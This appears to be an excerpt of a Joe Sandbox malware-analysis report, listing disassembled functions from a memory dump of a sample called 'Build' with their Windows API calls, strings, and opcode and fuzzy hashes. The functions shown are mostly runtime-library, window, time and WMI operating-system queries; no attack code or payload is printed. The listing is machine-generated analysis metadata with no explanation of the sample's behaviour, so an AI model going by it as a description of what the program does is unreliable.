Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t"F
API String ID: 2407758923-593758458
Opcode ID: eabc051a51bb7a4b53ae8c8ddf376f8b6c870de66996ecc151b6d2d6aac34c10
Instruction ID: 46f852c082bbcc9f42a561bff4c761c9f30fcf3065dd7866f53095445da3d946
Opcode Fuzzy Hash: eabc051a51bb7a4b53ae8c8ddf376f8b6c870de66996ecc151b6d2d6aac34c10
Instruction Fuzzy Hash: 14819E72608301AFD714DF68CD99A6FBBE9EB88704F00192EF985D3250D778E909CB56

Function 0044F172 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0044F1B6

Part of subcall function 0044ED51: _free.LIBCMT ref: 0044ED6E
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044ED80
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044ED92
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EDA4
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EDB6
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EDC8
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EDDA
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EDEC
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EDFE
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EE10
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EE22
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EE34
Part of subcall function 0044ED51: _free.LIBCMT ref: 0044EE46

_free.LIBCMT ref: 0044F1AB

Part of subcall function 0044BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?), ref: 0044BB10
Part of subcall function 0044BAFA: GetLastError.KERNEL32(?,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?,?), ref: 0044BB22

_free.LIBCMT ref: 0044F1CD
_free.LIBCMT ref: 0044F1E2
_free.LIBCMT ref: 0044F1ED
_free.LIBCMT ref: 0044F20F
_free.LIBCMT ref: 0044F222
_free.LIBCMT ref: 0044F230
_free.LIBCMT ref: 0044F23B
_free.LIBCMT ref: 0044F273
_free.LIBCMT ref: 0044F27A
_free.LIBCMT ref: 0044F297
_free.LIBCMT ref: 0044F2AF

Strings

h)F, xrefs: 0044F25E

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h)F
API String ID: 161543041-1652308164
Opcode ID: 781724cfe950cff0993c5ecbba2803c244e8219bdb1efde4f3127f54eadac00c
Instruction ID: 2a0e0a214fa0a918280a983c8d7d2617a2d1091f4044ab2358a087777dd0be62
Opcode Fuzzy Hash: 781724cfe950cff0993c5ecbba2803c244e8219bdb1efde4f3127f54eadac00c
Instruction Fuzzy Hash: B0313831600601DFFB20EA6AD845B9773E9FF00314F24456BE44AE7251DFB9ED458A68

Function 0043F9EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0043FA20
GetClassNameW.USER32(00000000,?,00000800), ref: 0043FA4C

Part of subcall function 00434168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0042E084,00000000,.exe,?,?,00000800,?,?,?,0043AD5D), ref: 0043417E

GetWindowLongW.USER32(00000000,000000F0), ref: 0043FA68
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0043FA7F
GetObjectW.GDI32(00000000,00000018,?), ref: 0043FA93
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0043FABC
DeleteObject.GDI32(00000000), ref: 0043FAC3
GetWindow.USER32(00000000,00000002), ref: 0043FACC

Strings

STATIC, xrefs: 0043FA52

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: f8a85d2b8112b7b050a7b0547c789b0eaf0f0b88975f59c13ce4a3a04c98b782
Instruction ID: 715ca94eda5dab07559bede6604e20466892c32e242a6dc27d501ba68f284b44
Opcode Fuzzy Hash: f8a85d2b8112b7b050a7b0547c789b0eaf0f0b88975f59c13ce4a3a04c98b782
Instruction Fuzzy Hash: 382125329447107BE620AB308C8AFAF769CAF4C700F10183EF955A6292DB78D94547AD

Function 0044B8B1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044B8C5

Part of subcall function 0044BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?), ref: 0044BB10
Part of subcall function 0044BAFA: GetLastError.KERNEL32(?,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?,?), ref: 0044BB22

_free.LIBCMT ref: 0044B8D1
_free.LIBCMT ref: 0044B8DC
_free.LIBCMT ref: 0044B8E7
_free.LIBCMT ref: 0044B8F2
_free.LIBCMT ref: 0044B8FD
_free.LIBCMT ref: 0044B908
_free.LIBCMT ref: 0044B913
_free.LIBCMT ref: 0044B91E
_free.LIBCMT ref: 0044B92C

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8ea0ce221200ae1473e70fe597c1e669ecdacfdbf97f27c72d9e90161309556c
Instruction ID: ab319a9345014c5108dcab880cee3cb76adc4990d65c085c5e66423053150e7c
Opcode Fuzzy Hash: 8ea0ce221200ae1473e70fe597c1e669ecdacfdbf97f27c72d9e90161309556c
Instruction Fuzzy Hash: 1A11B97A100148BFDB01EF5AC992CD93B75EF04354B0180AAFA095F222DB75EE52DBC4

Function 00445451 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00445570
___TypeMatch.LIBVCRUNTIME ref: 0044567E
_UnwindNestedFrames.LIBCMT ref: 004457D0
CallUnexpected.LIBVCRUNTIME ref: 004457EB
_abort.LIBCMT ref: 004457F0

Strings

csm, xrefs: 004455A7
csm, xrefs: 0044548E
csm, xrefs: 004454FB

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 9883608f14976848c392a8ddd12f5d31d6fd22086c84470a7476681c11550f25
Instruction ID: 56299eba3b9c995fb80f836aab6ee9009ea71a3559dbce5ef32975886d41a00c
Opcode Fuzzy Hash: 9883608f14976848c392a8ddd12f5d31d6fd22086c84470a7476681c11550f25
Instruction Fuzzy Hash: 7EB18671800A19EFEF25DFA5C8819AEBBB5BF04314F14416BE8056B203D739EA51CF99

Function 0042CE64 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 202COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0042CE6B
VariantClear.OLEAUT32(?), ref: 0042D015

Strings

fD, xrefs: 0042CE88
ROOT\CIMV2, xrefs: 0042CE99
SELECT * FROM Win32_OperatingSystem, xrefs: 0042CF2C
Windows 10, xrefs: 0042CFFB
Name, xrefs: 0042CFE9
WQL, xrefs: 0042CF3E

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ClearH_prolog3Variant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$fD
API String ID: 3629354427-4030150044
Opcode ID: 9119ad8b2cfd9979eefadfebe71ba56eada5f86ba0d03083a1012dbbb509dfff
Instruction ID: 97753608ed6c2da49640e99dbe76a7eb00305dc94bbed205d9f9e648ba904319
Opcode Fuzzy Hash: 9119ad8b2cfd9979eefadfebe71ba56eada5f86ba0d03083a1012dbbb509dfff
Instruction Fuzzy Hash: 9A715D70B002299FDB14DFA4DC94EAFB7B9BF48715B51016EF506A72A1CB38AD01CB58

Function 00451CDD Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00452452,00000000,00000000,00000000,00000000,00000000,?), ref: 00451D1F
__fassign.LIBCMT ref: 00451D9A
__fassign.LIBCMT ref: 00451DB5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00451DDB
WriteFile.KERNEL32(?,00000000,00000000,R$E,00000000,?,?,?,?,?,?,?,?,?,00452452,00000000), ref: 00451DFA
WriteFile.KERNEL32(?,00000000,00000001,R$E,00000000,?,?,?,?,?,?,?,?,?,00452452,00000000), ref: 00451E33

Strings

R$E, xrefs: 00451DEE, 00451E26, 00451DF1, 00451E29

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: R$E
API String ID: 1324828854-1730639733
Opcode ID: 22d6f86c314e9b4fe6dcf4ae7297357a757be71b666b94ef2d928403fc0c3b78
Instruction ID: 705f6634c8a4b02e76b84ed1de68ab632b449b05c632ac70075d4aa4b079b116
Opcode Fuzzy Hash: 22d6f86c314e9b4fe6dcf4ae7297357a757be71b666b94ef2d928403fc0c3b78
Instruction Fuzzy Hash: 8651C274A002449FDB10CFA8D841BEEBBB8FF09301F14456BE951E72A2E734A945CB64

Function 0043B631 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0043B656
_wcslen.LIBCMT ref: 0043B6F6
GlobalAlloc.KERNEL32(00000040,?), ref: 0043B705
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0043B726

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 0043B680
utf-8"></head>, xrefs: 0043B68B
</html>, xrefs: 0043B6D7
<html>, xrefs: 0043B675, 0043B6AE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: e315d9d5ac063ee58fe6f7ebd0e48d208971d47bb7e8826fdfa0ee603b33124a
Instruction ID: d7b9abebd4d95f23a91361f1e5d32aa9335f9e93b1b8b331333c8043545e24e3
Opcode Fuzzy Hash: e315d9d5ac063ee58fe6f7ebd0e48d208971d47bb7e8826fdfa0ee603b33124a
Instruction Fuzzy Hash: 413104721083017AE725AB359C06F6F779CDF99325F10052FFA0196283EB6C994983EE

Function 0043D8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00421366: GetDlgItem.USER32(00000000,00003021), ref: 004213AA
Part of subcall function 00421366: SetWindowTextW.USER32(00000000,004565F4), ref: 004213C0

EndDialog.USER32(?,00000001), ref: 0043D910
SendMessageW.USER32(?,00000080,00000001,00020495), ref: 0043D937
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0043D950
SetWindowTextW.USER32(?,?), ref: 0043D961
GetDlgItem.USER32(?,00000065), ref: 0043D96A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0043D97E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0043D994

Strings

LICENSEDLG, xrefs: 0043D8D4

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 4289929dedd9afa846cd18d47c670616226269b14ffea72d2d0e3b01477b4aca
Instruction ID: c4ee09b5cdf15c9d2b36aefed5c0f060284c4707f71ea6db5b4513eb0ce6dae4
Opcode Fuzzy Hash: 4289929dedd9afa846cd18d47c670616226269b14ffea72d2d0e3b01477b4aca
Instruction Fuzzy Hash: F221A272A042047BE7115F65FC4DF3F3B6CEB4AB86F11482EF601A26A0CB5A9901977D

Function 0043CBC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0043CBEE
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0043CC05
SystemTimeToFileTime.KERNEL32(?,?), ref: 0043CC19
FileTimeToSystemTime.KERNEL32(?,?), ref: 0043CC2A
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0043CC42
GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0043CC66
_swprintf.LIBCMT ref: 0043CC85

Strings

%s %s, xrefs: 0043CC7C

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Time$System$File$Format$DateLocalSpecific_swprintf
String ID: %s %s
API String ID: 385609497-2939940506
Opcode ID: 5b0c70281a0240797eb693227215420700ab335bac75a3431d2ed56f7eaba168
Instruction ID: d0b58d7296864d50ae4b94d50a46ca8d1e75eb1c5cbd9273459eba58b974cc9a
Opcode Fuzzy Hash: 5b0c70281a0240797eb693227215420700ab335bac75a3431d2ed56f7eaba168
Instruction Fuzzy Hash: F4215AB250024CABDB20DFA1DD44EEF73BCEB09305F00456AFA09D3012E634DA04CB64

Function 00442360 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,0042CEA9,0042CEAB,00000000,00000000,D72E4020,00000001,00000000,00000000,?,0042CD87,?,00000004,0042CEA9,ROOT\CIMV2), ref: 004423E9
MultiByteToWideChar.KERNEL32(00000000,00000000,0042CEA9,?,00000000,00000000,?,?,0042CD87,?,00000004,0042CEA9), ref: 00442464
SysAllocString.OLEAUT32(00000000), ref: 0044246F
_com_issue_error.COMSUPP ref: 00442498
_com_issue_error.COMSUPP ref: 004424A2
GetLastError.KERNEL32(80070057,D72E4020,00000001,00000000,00000000,?,0042CD87,?,00000004,0042CEA9,ROOT\CIMV2), ref: 004424A7
_com_issue_error.COMSUPP ref: 004424BA
GetLastError.KERNEL32(00000000,?,0042CD87,?,00000004,0042CEA9,ROOT\CIMV2), ref: 004424D0
_com_issue_error.COMSUPP ref: 004424E3

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: cbb1d0b4dc4e9d5e4b6e7b3b4fc5c369f41af35ebbc0c9204c2006d26311f287
Instruction ID: 3136c4c230c197bad274eb44f3a4face7aa3a1407c1e03ccd83382574bb6d586
Opcode Fuzzy Hash: cbb1d0b4dc4e9d5e4b6e7b3b4fc5c369f41af35ebbc0c9204c2006d26311f287
Instruction Fuzzy Hash: C741F871A00305ABE710DFA5DD45BAFBBA8EB48715F50422FF905E7291D7BC980087AD

Function 0044C06A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044C0F5
__alldvrm.LIBCMT ref: 0044C2F6
__alldvrm.LIBCMT ref: 0044C318

Strings

=zD, xrefs: 0044C2B7
=zD, xrefs: 0044C074
=zD, xrefs: 0044C080, 0044C0DB, 0044C0F4, 0044C27A

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID: =zD$=zD$=zD
API String ID: 1036877536-4272739042
Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction ID: bd01e0d27ac2342454f1da0f35564a196691733b5ab990dbb79094f94f8f70a0
Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction Fuzzy Hash: 85A14636A022869FFB11CF58C8D17AEBBA4EF52354F1C41AFD8859B342C67C8941CB59

Function 00444F20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00444F57
___except_validate_context_record.LIBVCRUNTIME ref: 00444F5F
_ValidateLocalCookies.LIBCMT ref: 00444FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00445013
_ValidateLocalCookies.LIBCMT ref: 00445068

Strings

MD, xrefs: 00445005, 0044500E, 0044501F
csm, xrefs: 00444FFD

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: MD$csm
API String ID: 1170836740-2554494080
Opcode ID: fd9da273a55b4955d53cf6e9fada934c721c7cea80568c8899d3d3597d722b74
Instruction ID: 3c698f7a7aaec6df03a09ed0f2e2748a566169706de76ea5843dc315073feaec
Opcode Fuzzy Hash: fd9da273a55b4955d53cf6e9fada934c721c7cea80568c8899d3d3597d722b74
Instruction Fuzzy Hash: 1B41E634A00214ABDF10DF69C881B9E7BB5BF45319F14815BF8149B393DB39DA05CB95

Function 004332F8 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0043331D

Part of subcall function 0042D076: GetVersionExW.KERNEL32(?), ref: 0042D0A7

FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00433340
FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00433352
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00433363
SystemTimeToFileTime.KERNEL32(?,?), ref: 00433373
SystemTimeToFileTime.KERNEL32(?,?), ref: 00433383
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004333BE
__aullrem.LIBCMT ref: 00433464

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
